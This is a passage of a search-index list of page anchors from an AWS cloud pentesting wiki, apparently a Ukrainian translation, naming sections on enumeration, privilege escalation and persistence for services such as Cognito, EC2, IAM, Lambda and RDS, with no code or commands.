ecurity/aws-services/aws-cloudformation-and-codestar-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#aws---cloudhsm-enum","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#hsm---hardware-security-module","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#cloudhsm-suggestions","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#Що-таке-апаратний-модуль-безпеки","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#aws---cloudfront-enum","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#cloudfront","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#functions","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#aws---codebuild-enum","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#codebuild","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#githubgitlabbitbucket-credentials","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#aws---cognito-enum","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#cognito","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#persistence","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-sync","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#Доступ-до-iam-ролей","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#Неавтентифіковані","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#Розширений-vs-Базовий-потік-автентифікації","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#Аутентифіковані","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#cognito-user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Потенційні-атаки","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Інструменти-для-пентестингу","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Реєстрація","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Підтвердження-реєстрації","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Підвищення-привілеїв--Оновлення-атрибутів","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#ВідновленняЗміна-пароля","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Аутентифікація","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#admin_no_srp_auth--admin_user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_srp_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#refresh_token_auth--refresh_token","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#custom_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Додаткова-безпека","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Розширена-безпека","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#mfa-Запамятати-пристрій","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Ролі-iam-груп-користувачів","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#aws---datapipeline-codepipeline--codecommit-enum","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#datapipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codepipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codecommit","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#aws---directory-services--workdocs-enum","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#directory-services","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#options","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#lab","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Вхід","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Підвищення-привілеїв","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Використання-користувача-ad","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Спільний-доступ-до-ad-від-жертви-до-атакуючого","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Спільний-доступ-до-ad-від-атакуючого-до-жертви","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#aws---documentdb-enum","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#nosql-injection","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb-1","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#aws---dynamodb-enum","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Шифрування","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Резервні-копії-та-експорт-до-s3","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#gui","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Підвищення-привілеїв","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Постексплуатація","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Персистентність","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Впровадження-в-dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#sql-інєкція","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#nosql-інєкція","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Сира-інєкція-json","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#property-injection","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#aws---ec2-ebs-elb-ssm-vpc--vpn-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpc--networking","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ec2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#instance-profiles","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#metadata-endpoint","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Підвищення-привілеїв","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Пост-експлуатація","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Різниця-ami-та-ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Підвищення-привілеїв-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ssm","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#elb","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Шаблони-запуску-та-групи-автоскалювання","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Перерахування-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#nitro","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Локальна-Перевірка","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#aws---nitro-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Встановлення-nitro-enclave-cli","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-images","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Запустіть-зображення","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Перерахунок-Енклавів","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Завершення-енклавів","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsocks","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-serverlistener","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-client","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-proxy","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-atestation--kms","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#pcr-bypass","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws---vpc--networking-basic-information","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws-networking-in-a-nutshell","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Підмережі","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Таблиці-маршрутизації","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#acl","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Групи-безпеки","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Еластичні-ip-адреси","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Зєднання-між-підмережами","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Пірінг-vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Журнали-потоку-vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Основні-компоненти-aws-vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#site-to-site-vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#Клієнтський-vpn","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum-1","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#ecr","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#aws---ecs-enum","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#ecs","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Чутливі-дані-у-визначеннях-завдань","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Підвищення-привілеїв","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#aws---eks-enum","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#eks","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aws---elastic-beanstalk-enum","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Додаток-та-середовища","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#2-типи-середовищ","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Безпека","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Вразливість","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Персистентність","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Підвищення-привілеїв","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#aws---elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#privesc-todo","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#aws---emr-enum","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#emr","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#aws---efs-enum","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#Мережевий-доступ","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#mount-efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#iam-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#Точки-доступу","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs-ip-адреса","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#Привілегії","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#aws---eventbridge-scheduler-enum","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler-1","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#types-of-schedules","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#targets","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#privesc","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#aws---kinesis-data-firehose-enum","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#kinesis-data-firehose","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#Пост-експлуатація--Обхід-захисту","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehosedeletedeliverystream","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseupdatedestination","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseputrecord--firehoseputrecordbatch","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#aws---iam-identity-center--sso-enum","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#permissions-brute-force","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Підвищення-привілеїв","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-Персистентність","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-Центр-ідентичності","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Підключення-через-sso-з-cli","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Локальна-Перерахунка","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Неавтентифікований-доступ-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Підвищення-привілеїв-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#aws---kms-enum","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#kms---Служба-управління-ключами","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Політики-ключів","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Адміністратори-ключів","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Ротація-cmk","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Інша-релевантна-інформація-kms","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#aws---lambda-enum","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Ваги-псевдонімів-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Політики-ресурсів","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Проксі-бази-даних-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Файлові-системи-efs-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Шари-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Розширення-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Викликати-лямбду","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Постексплуатація","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Персистентність","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail-enum","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Аналіз-знімків","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Метадані","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Привілейоване-підвищення","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Після-експлуатації","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#amazon-macie","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#Вступ","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#Перегляд-Знахідок-за-Допомогою-aws-console","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#Виявлення-Секрету","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---mq-enum","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#amazon-mq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#Вступ-до-брокерів-повідомлень","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---rabbitmq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---activemq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#aws---msk-enum","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#amazon-msk","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#Типи","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#Доступ-iam-до-kafka-в-безсерверному-режимі","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#aws---organizations-enum","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#aws---redshift-enum","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#amazon-redshift","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#kms","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#cloudhsm","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#aws---relational-database-rds-enum","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Облікові-дані","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Аутентифікація","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Публічний-доступ-та-vpc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Шифрування","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Підвищення-привілеїв","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Постексплуатація","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#sql-інєкція","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#aws---route53-enum","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#route-53","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#ip-орієнтоване-маршрутизація","pentesting-cloud/aws-security/aws-services/aws-